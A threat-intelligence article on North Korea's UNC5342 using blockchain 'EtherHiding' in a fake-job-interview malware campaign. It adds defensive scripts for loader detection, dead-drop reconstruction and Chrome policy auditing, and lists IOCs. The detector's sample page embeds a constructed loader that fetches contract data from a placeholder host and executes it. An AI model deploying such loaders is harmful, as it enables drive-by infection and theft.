North Korean Hackers Exploit EtherHiding to Spread Malware and Steal Crypto Assets


The cybersecurity landscape has witnessed a significant evolution in attack techniques with North Korean threat actors adopting EtherHiding, a sophisticated method that leverages blockchain technology to distribute malware and facilitate cryptocurrency theft.

EtherHiding represents a fundamental shift in how cybercriminals store and deliver malicious payloads by embedding malware code within smart contracts on public blockchains like BNB Smart Chain and Ethereum.

This technique essentially transforms the blockchain into a decentralized command-and-control server that offers unprecedented resilience against traditional takedown efforts and blocklisting measures.

Google Threat Intelligence Group (GTIG) has identified the North Korea-linked threat actor UNC5342 as the first nation-state group observed using this innovative technique, marking a concerning advancement in state-sponsored cyber operations.

The method first emerged in September 2023 during the financially motivated CLEARFAKE campaign conducted by threat cluster UNC5142, which used deceptive overlays such as fake browser update prompts to manipulate victims into executing malicious code.

The attack chain begins when North Korean threat actors compromise legitimate websites through vulnerabilities or stolen credentials, then inject a small JavaScript loader script into the compromised site.

When unsuspecting users visit the infected website, the loader script executes in their browser and communicates with the blockchain to retrieve the main malicious payload stored remotely.

A critical feature of this retrieval process is that the loader uses read-only function calls, which do not create blockchain transactions; the retrieval therefore leaves no on-chain record and incurs no gas fees.
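The attack chain above starts with an injected loader script on a compromised site. As an added example that is not code from the article or from GTIG, the following Python script shows the kind of check a site owner or web integrity monitor can run over a page's HTML: it pulls out every inline script and flags those that combine blockchain read indicators (an eth_call JSON-RPC envelope, explorer API hostnames) with dynamic execution of fetched content. The sample page, the RPC hostname and the contract address in it are constructed for this example.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: one benign analytics snippet plus one injected,
# loader-style snippet. Both are made up for this example and are not
# samples from the campaign described in the article.
SAMPLE_HTML = """
<html><head><title>Example site</title>
<script src="/static/app.js"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
</script>
</head><body>
<h1>Welcome</h1>
<script>
  // injected: read a value from a contract with a read-only call, then run it
  fetch("https://rpc.example-node.invalid/", {method: "POST",
    body: JSON.stringify({jsonrpc: "2.0", id: 1, method: "eth_call",
      params: [{to: "0x0000000000000000000000000000000000000000", data: "0x00"}, "latest"]})})
  .then(r => r.json()).then(j => new Function(atob(j.result))());
</script>
</body></html>
"""

# Indicator names are this example's own labels, not a vendor taxonomy.
INDICATORS = {
    "jsonrpc_read_method": re.compile(r"eth_call|eth_getTransactionByHash", re.I),
    "jsonrpc_envelope": re.compile(r'jsonrpc\s*[:=]\s*"?2\.0', re.I),
    "explorer_api": re.compile(r"(bscscan|etherscan|binplorer)\.(com|io)", re.I),
    "dynamic_exec": re.compile(r"\bnew Function\s*\(|\beval\s*\(|\batob\s*\(", re.I),
}


class _InlineScriptCollector(HTMLParser):
    """Collects the bodies of <script> elements that have no src attribute."""

    def __init__(self):
        super().__init__()
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script" and not dict(attrs).get("src"):
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def extract_inline_scripts(html):
    """Return the text of every inline <script> block in document order."""
    collector = _InlineScriptCollector()
    collector.feed(html)
    return collector.inline


def score_script(js):
    """Return the sorted list of indicator names that match a script body."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(js))


def find_suspicious(html, min_hits=2):
    """Return (script_index, indicators) for scripts with at least min_hits indicators."""
    results = []
    for index, js in enumerate(extract_inline_scripts(html)):
        hits = score_script(js)
        if len(hits) >= min_hits:
            results.append((index, hits))
    return results


if __name__ == "__main__":
    for index, hits in find_suspicious(SAMPLE_HTML):
        print(f"inline script #{index}: {', '.join(hits)}")
```

Requiring two or more indicators keeps ordinary dApp front ends (which legitimately call eth_call) from tripping the check on their own; the combination of a chain read with `new Function`/`eval`/`atob` on the result is what distinguishes a loader from a wallet UI. In practice this runs against a known-good baseline of the site's HTML so that any newly appearing inline script is reviewed regardless of score.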

The Strategic Advantages for Attackers

EtherHiding provides attackers with several compelling advantages that make this technique particularly difficult to counter.

The decentralized nature of blockchain means there is no central server that law enforcement or cybersecurity firms can take down, with malicious code remaining accessible as long as the blockchain itself operates.

The pseudonymous nature of blockchain transactions makes tracing attacker identities extremely challenging, while the immutability of smart contracts means that deployed malicious code typically cannot be removed or altered by anyone except the contract owner.

Perhaps most concerning is the flexibility this technique affords attackers. Because they control the smart contract, threat actors can update the malicious payload at any time, changing attack methods, rotating domains, or deploying different malware types, all through a single contract update.

Additionally, attackers can retrieve payloads using read-only calls that leave no visible transaction history on the blockchain, making their activities significantly harder to track.

This combination of features represents a shift toward next-generation bulletproof hosting, where blockchain’s inherent features are repurposed for malicious ends.

Since February 2025, GTIG has tracked UNC5342 incorporating EtherHiding into an ongoing social engineering campaign dubbed Contagious Interview by Palo Alto Networks.

This sophisticated operation targets developers, particularly in the cryptocurrency and technology sectors, through an elaborate fake recruitment process that cleverly exploits job application procedures.

The campaign serves dual purposes aligned with North Korea’s strategic objectives: generating revenue through cryptocurrency theft to bypass international sanctions, and conducting espionage by compromising developers to gather intelligence and gain footholds in technology companies.

The attack begins with fake recruiters creating convincing profiles on professional networking sites like LinkedIn, often impersonating representatives from well-known tech or cryptocurrency firms.

In some instances, attackers have established completely fabricated companies with fake websites and social media presences for entities like BlockNovas LLC, Angeloper Agency, and SoftGlideLLC.

Once initial contact is made, victims are moved to platforms like Telegram or Discord for the fake interview process.

The core of the attack occurs during a technical assessment phase where candidates are asked to download files from repositories like GitHub for coding tests or project reviews.

These files contain malicious code that initiates a multi-stage infection process. The campaign employs JADESNOW malware as an initial downloader, which then deploys a JavaScript variant of INVISIBLEFERRET.

Figure: UNC5342 on-chain activity.

This second-stage malware is designed to scan for and exfiltrate sensitive data, particularly targeting cryptocurrency wallets, browser extension data, and credentials.

For high-value targets, the persistent INVISIBLEFERRET backdoor provides attackers with remote control over compromised systems, enabling long-term espionage, data theft, and lateral movement within networks.

JADESNOW and Blockchain Infrastructure

JADESNOW is a JavaScript-based downloader malware family specifically associated with UNC5342 that utilizes EtherHiding to fetch, decrypt, and execute malicious payloads from smart contracts on BNB Smart Chain and Ethereum.

Figure: UNC5342 EtherHiding on BNB Smart Chain and Ethereum.

The initial downloader queries the BNB Smart Chain through various API providers, including Binplorer, to read the JADESNOW payload stored in smart contracts.

Analysis of one particular smart contract revealed it had been updated over 20 times within the first four months, with each update costing an average of just $1.37 USD in gas fees. This low cost and high frequency of updates illustrates the attacker’s ability to easily modify campaign configurations.

What makes UNC5342’s implementation particularly notable is the use of multiple blockchains within the same operation.

While the initial JADESNOW downloader queries BNB Smart Chain, the obfuscated payload pivots to Ethereum by performing GET requests to query transaction history of attacker-controlled addresses.

Rather than storing the payload in an Ethereum smart contract, the attackers read the calldata (input data) of transactions sent to the well-known burn address, effectively using the transaction itself as a dead drop resolver.

Figure: On-chain transactions.

These transactions are generated frequently, showing how easily the campaign can be updated with a simple blockchain transaction, including changing the C2 server.
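The dead drop resolver described above (and the split payloads listed in the IOC table) is what an analyst has to reconstruct when investigating the Ethereum side of the campaign. The Python below is an added example, not GTIG's tooling or the campaign's code: given transaction records in the shape returned by the JSON-RPC method eth_getTransactionByHash, it keeps only transactions sent to the drop address, discards inputs that are not mostly text (ordinary contract calls), orders the remaining pieces by sender nonce, reassembles the calldata and pulls out any embedded URLs. The transaction records, the drop address (the zero address is used as a placeholder because the article does not name the burn address) and the C2 URL are all constructed for this example.

```python
import json
import re
import string

# Assumption for this example: a placeholder "burn" address. The article
# does not state which burn address the campaign used.
DROP_ADDRESS = "0x0000000000000000000000000000000000000000"


def _hex(data: bytes) -> str:
    return "0x" + data.hex()


# Constructed records with only the eth_getTransactionByHash fields used here.
# Hashes, nonces and the payload text are made up; the URL is a placeholder.
SAMPLE_TXS = [
    {"hash": "0xaaa1", "to": DROP_ADDRESS, "nonce": "0x12",
     "input": _hex(b'"https://c2.example.invalid/api","ver":3}')},
    {"hash": "0xaaa0", "to": DROP_ADDRESS, "nonce": "0x11",
     "input": _hex(b'{"c2":')},
    # an unrelated token transfer to another address (4-byte selector only)
    {"hash": "0xbbb0", "to": "0x1111111111111111111111111111111111111111",
     "nonce": "0x13", "input": "0xa9059cbb"},
    # binary data sent to the drop address: not a text piece, must be skipped
    {"hash": "0xccc0", "to": DROP_ADDRESS, "nonce": "0x10",
     "input": _hex(bytes(range(0, 200)))},
]

URL_RX = re.compile(r"""https?://[^\s"'<>]+""")


def decode_input(hex_input: str) -> bytes:
    """Turn a 0x-prefixed calldata string into raw bytes (tolerates odd length)."""
    h = hex_input[2:] if hex_input.lower().startswith("0x") else hex_input
    if len(h) % 2:
        h = "0" + h
    return bytes.fromhex(h)


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII; 0.0 for empty input."""
    if not data:
        return 0.0
    return sum(1 for b in data if chr(b) in string.printable) / len(data)


def dead_drop_pieces(txs, drop_address, min_ratio=0.9):
    """Return (nonce, tx_hash, bytes) for text-like calldata sent to the drop address, nonce-ordered."""
    pieces = []
    for tx in txs:
        if (tx.get("to") or "").lower() != drop_address.lower():
            continue
        data = decode_input(tx["input"])
        if printable_ratio(data) < min_ratio:
            continue
        pieces.append((int(tx["nonce"], 16), tx["hash"], data))
    pieces.sort()
    return pieces


def reassemble(txs, drop_address) -> str:
    """Concatenate the ordered pieces into one string (split payloads become whole)."""
    return b"".join(p[2] for p in dead_drop_pieces(txs, drop_address)).decode("utf-8", "replace")


def recover_config(txs, drop_address):
    """Parse the reassembled text as JSON; None if it is not JSON."""
    try:
        return json.loads(reassemble(txs, drop_address))
    except json.JSONDecodeError:
        return None


def extract_urls(text: str):
    return URL_RX.findall(text)


if __name__ == "__main__":
    text = reassemble(SAMPLE_TXS, DROP_ADDRESS)
    print("recovered:", text)
    print("urls:", extract_urls(text))
```

The same pipeline applies when the pieces are obfuscated rather than plain JSON: swap the `recover_config` step for the decoding the sample uses, but keep the nonce ordering, since a split payload is only meaningful once its pieces are joined in the order the attacker sent them. Any URL that falls out is a candidate for the URLBlocklist discussed later and for network detection, not something to fetch from an analyst workstation.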

Despite the decentralized nature of blockchain networks, both UNC5342 and UNC5142 rely on centralized services to interact with the blockchain, creating potential points of intervention for defenders.

Neither threat actor interacts directly with BNB Smart Chain when retrieving information from smart contracts; instead, they utilize centralized API services similar to traditional Web2 services.

UNC5142 uses RPC endpoints for direct communication with BNB Smart Chain nodes, while UNC5342 employs API services hosted by central entities that act as abstraction layers between the threat actor and the blockchain.

Defense Strategies and Recommendations

Traditional campaign mitigation strategies that rely on blocking known domains and IPs prove insufficient against EtherHiding, as smart contracts operate autonomously and cannot be shut down through conventional means.

While blockchain scanners like BscScan and Etherscan allow security researchers to tag contracts as malicious, tagging does not stop a deployed contract from continuing to serve its payload.

Chrome Enterprise offers a centralized mitigation approach by using Chrome Browser Cloud Management to configure and enforce security policies across all managed browsers in an organization.

Key prevention policies include implementing DownloadRestrictions to block dangerous file types like .exe, .msi, .bat, and .dll, preventing malicious payloads from being saved to users’ computers.

Organizations should also leverage managed updates that push Chrome updates silently and automatically in the background, undermining the social engineering tactic of fake update prompts.

Additionally, URLBlocklist policies can block access to known malicious websites or blockchain node URLs identified by threat intelligence, while enforcing Google’s Safe Browsing in enhanced mode provides real-time threat intelligence to warn users about phishing sites and malicious downloads.
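The three policies named above (DownloadRestrictions, URLBlocklist and Safe Browsing enhanced mode) are the ones an administrator can check for in a managed Chrome policy file, for example one under /etc/opt/chrome/policies/managed/ on Linux. The following Python is an added example, not Google's or GTIG's code: it embeds a weak policy beside a hardened one and audits each against those settings. The policy names and value meanings (DownloadRestrictions 0 = no special restrictions; SafeBrowsingProtectionLevel 0 = off, 1 = standard, 2 = enhanced) are Chrome's; the blocklisted hostnames are placeholders constructed for the example.

```python
import json

# Constructed weak policy: downloads unrestricted, standard Safe Browsing, no blocklist.
WEAK_POLICY_JSON = """{
  "DownloadRestrictions": 0,
  "SafeBrowsingProtectionLevel": 1
}"""

# Constructed hardened policy. The hostnames are placeholders standing in for
# entries supplied by threat intelligence (malicious sites, blockchain node URLs).
HARDENED_POLICY_JSON = """{
  "DownloadRestrictions": 1,
  "SafeBrowsingProtectionLevel": 2,
  "URLBlocklist": [
    "fake-browser-update.example.invalid",
    "rpc.example-node.invalid"
  ]
}"""

DOWNLOAD_RESTRICTION_NAMES = {
    0: "no special restrictions",
    1: "block dangerous downloads",
    2: "block potentially dangerous downloads",
    3: "block all downloads",
    4: "block malicious downloads",
}
SAFE_BROWSING_NAMES = {0: "off", 1: "standard", 2: "enhanced"}


def audit_chrome_policy(policy: dict) -> list:
    """Return a list of findings; an empty list means the three checks pass."""
    findings = []

    # An unset DownloadRestrictions behaves like 0 (no special restrictions).
    dr = policy.get("DownloadRestrictions", 0)
    if dr == 0:
        findings.append("DownloadRestrictions is 0 (%s): dangerous downloads are not blocked"
                        % DOWNLOAD_RESTRICTION_NAMES[0])

    # Unset means the user chooses; treat as standard (1) for audit purposes.
    sb = policy.get("SafeBrowsingProtectionLevel", 1)
    if sb != 2:
        findings.append("SafeBrowsingProtectionLevel is %s (%s): enhanced protection (2) is not enforced"
                        % (sb, SAFE_BROWSING_NAMES.get(sb, "unknown")))

    if not policy.get("URLBlocklist"):
        findings.append("URLBlocklist is absent or empty: no threat-intel blocking of malicious sites or node URLs")

    return findings


def audit_policy_text(policy_json: str) -> list:
    """Audit a policy given as the JSON text of a managed policy file."""
    return audit_chrome_policy(json.loads(policy_json))


if __name__ == "__main__":
    for label, text in (("weak", WEAK_POLICY_JSON), ("hardened", HARDENED_POLICY_JSON)):
        findings = audit_policy_text(text)
        print(f"{label}: {'OK' if not findings else ''}")
        for finding in findings:
            print("  -", finding)
```

Managed updates, the other mitigation the article lists, are configured through the updater (Google Update on Windows, the system package manager on Linux) rather than through these Chrome policies, so they are out of scope for this file-level audit. Treat the policy file as the enforcement point and compare it against the effective settings shown at chrome://policy on a managed endpoint.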

The emergence of nation-state actors like UNC5342 adopting EtherHiding demonstrates the continuous evolution of cyber threats as attackers adapt and leverage emerging technologies for malicious purposes.

Indicators of Compromise (IOCs)

Type: SHA256 hash (ZIP archive)
Indicator: 970307708071c01d32ef542a49099571852846a980d6e8eb164d2578147a1628
Context: ZIP archive containing the initial downloader, in this case JADESNOW.

Type: SHA256 hash (initial JavaScript downloader)
Indicator: 01fd153bfb4be440dd46cea7bebe8eb61b1897596523f6f6d1a507a708b17cc7
Context: JADESNOW sample used to launch the infection chain.

Type: BSC address (smart contract)
Indicator: 0x8eac3198dd72f3e07108c4c7cff43108ad48a71c
Context: BNB Smart Chain contract used by UNC5342 to host the second-stage JADESNOW payload.

Type: BSC address (attacker-controlled)
Indicator: 0x9bc1355344b54dedf3e44296916ed15653844509
Context: Owner address of the malicious BNB Smart Chain contract.

Type: Ethereum transaction hash (INVISIBLEFERRET.JAVASCRIPT payload)
Indicator: 0x86d1a21fd151e344ccc0778fd018c281db9d40b6ccd4bdd3588cb40fade1a33a
Context: Transaction storing the INVISIBLEFERRET.JAVASCRIPT payload.

Type: Ethereum transaction hash (INVISIBLEFERRET.JAVASCRIPT split payload)
Indicator: 0xc2da361c40279a4f2f84448791377652f2bf41f06d18f19941a96c720228cd0f
Context: Transaction storing the split INVISIBLEFERRET.JAVASCRIPT payload.

Type: Ethereum transaction hash (INVISIBLEFERRET credential stealer payload)
Indicator: 0xf9d432745ea15dbc00ff319417af3763f72fcf8a4debedbfceeef4246847ce41
Context: Transaction storing the additional INVISIBLEFERRET.JAVASCRIPT credential stealer payload.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.